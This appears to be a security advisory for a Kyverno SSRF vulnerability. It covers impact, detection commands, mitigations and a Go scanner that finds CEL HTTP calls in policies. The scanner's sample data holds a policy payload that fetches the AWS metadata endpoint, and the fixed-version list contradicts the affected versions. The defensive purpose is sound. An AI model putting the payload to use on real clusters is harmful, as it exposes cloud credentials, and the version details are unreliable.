Platform: go
Component: github.com/kyverno/kyverno
Fixed in: 1.16.1, 1.17.0, 1.17.2
CVE-2026-4789 is a Server-Side Request Forgery (SSRF) vulnerability in Kyverno, a Kubernetes-native policy engine. A user who only holds permission to create policies in a single namespace can make the Kyverno admission controller issue arbitrary HTTP requests on their behalf, which can lead to unauthorized access to internal services and to data exfiltration. Affected: Kyverno 1.16.0 and later releases that predate the fix (the issue was confirmed on 1.16.2). The fix ships in 1.17.0.
An attacker with namespace-scoped policy creation permissions can write a policy whose CEL expressions call Kyverno's HTTP functions. The resulting requests are sent by the Kyverno admission controller, so they carry that pod's network identity and reach anything the controller can reach, bypassing network segmentation that would otherwise keep the attacker out. Targets include internal services inside the cluster (sensitive data, control interfaces) and cloud instance metadata endpoints such as 169.254.169.254 on AWS, which can expose credentials and configuration. Because the response of such a request can be embedded in the policy's error message, the data comes back to the attacker in the admission response itself, so no separate network path is needed to exfiltrate it.
This vulnerability was publicly disclosed on April 14, 2026. Its severity is rated HIGH (CVSS: 8.5). No active exploitation campaigns are known, and the vulnerability is not currently listed in the CISA KEV catalog. Public proof-of-concept exploits are expected to emerge as the vulnerability gains wider awareness, which raises the risk for unpatched clusters.
Organizations using Kyverno for policy enforcement in Kubernetes clusters are at risk, particularly those running versions 1.16.0 and above without the fix. Environments with many internal services and cloud integrations are especially exposed, because the SSRF can be used to reach sensitive data and credentials. Shared clusters with multiple namespaces and differing permission levels increase the risk further, since any tenant allowed to create policies in their own namespace can abuse the issue.
• kubernetes (kubectl; assumes the default Helm install with namespace 'kyverno' and deployment 'kyverno-admission-controller'):
kubectl -n kyverno logs deploy/kyverno-admission-controller | grep -i '169.254.169.254'
• kubernetes (check the running image tag against the fixed versions):
kubectl -n kyverno get deploy kyverno-admission-controller -o jsonpath='{.spec.template.spec.containers[*].image}{"\n"}'
• kubernetes (list every Kyverno CEL policy that calls an HTTP function):
kubectl api-resources --api-group=policies.kyverno.io -o name | xargs -I{} kubectl get {} -A -o yaml | grep -n 'http\.\(Get\|Post\|Client\)'
Exploit status: no known active exploitation
EPSS: 0.02% (5th percentile)
The primary mitigation for CVE-2026-4789 is to upgrade Kyverno to version 1.17.0 or later, which contains the fix. If an immediate upgrade is not feasible, apply temporary workarounds: tighten the RBAC that lets namespace users create Kyverno policies, and add Kubernetes NetworkPolicies that restrict the Kyverno admission controller's egress to what it needs (the API server and DNS), which blocks the metadata endpoint and internal services. Monitor Kyverno logs for unusual HTTP requests made during policy evaluation, and audit existing policies for CEL expressions that call HTTP functions. A WAF does not help here, because the requests are outbound from the admission controller rather than inbound to it; an egress proxy or NetworkPolicy is the right control to log and block them. No Sigma or YARA rules are available, but alerting on unusual destinations in the controller's outbound traffic is recommended.
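The mechanism described above (a policy whose CEL expression calls an HTTP function and leaks the response through its message) is easy to audit for in policy definitions. The following Go program is an added example, not code from Kyverno or from this advisory: it scans the JSON that `kubectl get <policy-resource> -A -o json` prints and reports every string field that invokes http.Get, http.Post or http.Client. The function names, the ValidatingPolicy field layout and the sample List are assumptions constructed for this example; adjust the regular expression if your Kyverno release exposes the CEL HTTP library under different names.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Finding is one string field in a policy object that calls a CEL HTTP function.
type Finding struct {
	Kind      string // policy kind, e.g. ValidatingPolicy
	Namespace string // empty for cluster-scoped policies
	Name      string
	Path      string // JSON path of the offending field inside the object
	Call      string // the matched call site, e.g. "http.Get("
}

// httpCall matches the entry points of Kyverno's CEL HTTP library.
// Assumed names: http.Get, http.Post and http.Client (which yields a client
// whose Get/Post methods are then called).
var httpCall = regexp.MustCompile(`\bhttp\.(Get|Post|Client)\s*\(`)

// sampleList is a constructed kubectl "-o json" List: one benign policy and
// one namespaced policy that embeds a metadata-endpoint fetch in its message.
const sampleList = `{
 "kind": "List",
 "items": [
  {"kind": "ValidatingPolicy",
   "metadata": {"name": "replica-limit"},
   "spec": {"validations": [
     {"expression": "object.spec.replicas <= 5",
      "message": "too many replicas"}]}},
  {"kind": "ValidatingPolicy",
   "metadata": {"name": "probe", "namespace": "tenant-a"},
   "spec": {"validations": [
     {"expression": "false",
      "messageExpression": "'metadata: ' + http.Get('http://169.254.169.254/latest/meta-data/')"}]}}
 ]
}`

// FindHTTPCalls accepts either a single object or a List with .items and
// returns every call site of a CEL HTTP function, sorted for stable output.
// It does not evaluate CEL; it only locates the calls.
func FindHTTPCalls(doc []byte) ([]Finding, error) {
	var root map[string]any
	if err := json.Unmarshal(doc, &root); err != nil {
		return nil, fmt.Errorf("parse policy JSON: %w", err)
	}
	items := []any{root}
	if list, ok := root["items"].([]any); ok && root["kind"] == "List" {
		items = list
	}
	var out []Finding
	for _, it := range items {
		obj, ok := it.(map[string]any)
		if !ok {
			continue
		}
		meta, _ := obj["metadata"].(map[string]any)
		kind, _ := obj["kind"].(string)
		name, _ := meta["name"].(string)
		ns, _ := meta["namespace"].(string)
		walk(obj, "$", func(path, s string) {
			if m := httpCall.FindString(s); m != "" {
				out = append(out, Finding{Kind: kind, Namespace: ns, Name: name, Path: path, Call: strings.TrimSpace(m)})
			}
		})
	}
	sort.Slice(out, func(i, j int) bool {
		a, b := out[i], out[j]
		return a.Namespace+"/"+a.Name+a.Path < b.Namespace+"/"+b.Name+b.Path
	})
	return out, nil
}

// walk visits every string value in a decoded JSON tree and reports its path.
func walk(v any, path string, visit func(path, s string)) {
	switch t := v.(type) {
	case map[string]any:
		for k, child := range t {
			walk(child, path+"."+k, visit)
		}
	case []any:
		for i, child := range t {
			walk(child, fmt.Sprintf("%s[%d]", path, i), visit)
		}
	case string:
		visit(path, t)
	}
}

func main() {
	findings, err := FindHTTPCalls([]byte(sampleList))
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s %s/%s at %s calls %s\n", f.Kind, f.Namespace, f.Name, f.Path, f.Call)
	}
}
```

Against the constructed sample the scanner reports only the tenant-a policy, at $.spec.validations[0].messageExpression. To run it on a real cluster, pipe `kubectl get <resource> -A -o json` for each resource under the policies.kyverno.io API group into the program instead of sampleList; a hit is not proof of abuse, but every hit deserves review until the fixed release is deployed.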
Update Kyverno to a release that contains the fix (1.17.0 or later) to close the SSRF vulnerability. The fix stops unrestricted use of the CEL HTTP functions from policies and thereby protects against the SSRF attacks described here.
CVE-2026-4789 is a HIGH severity Server-Side Request Forgery (SSRF) vulnerability affecting Kyverno versions 1.16.0 and later. It allows unauthorized access to internal services and cloud metadata.
You are affected if you run Kyverno 1.16.0 or later and have not upgraded to 1.17.0 or a later fixed release. The policy CRDs involved are enabled by default, so a default installation should be treated as affected.
Upgrade Kyverno to version 1.17.0 or later. As a temporary workaround, restrict network access and implement strict network policies.
There is currently no evidence of active exploitation, but the vulnerability's nature makes it a potential target.
Refer to the official Kyverno security advisory for detailed information and updates: [https://kyverno.io/security/advisories/kyverno-sa-001/](https://kyverno.io/security/advisories/kyverno-sa-001/)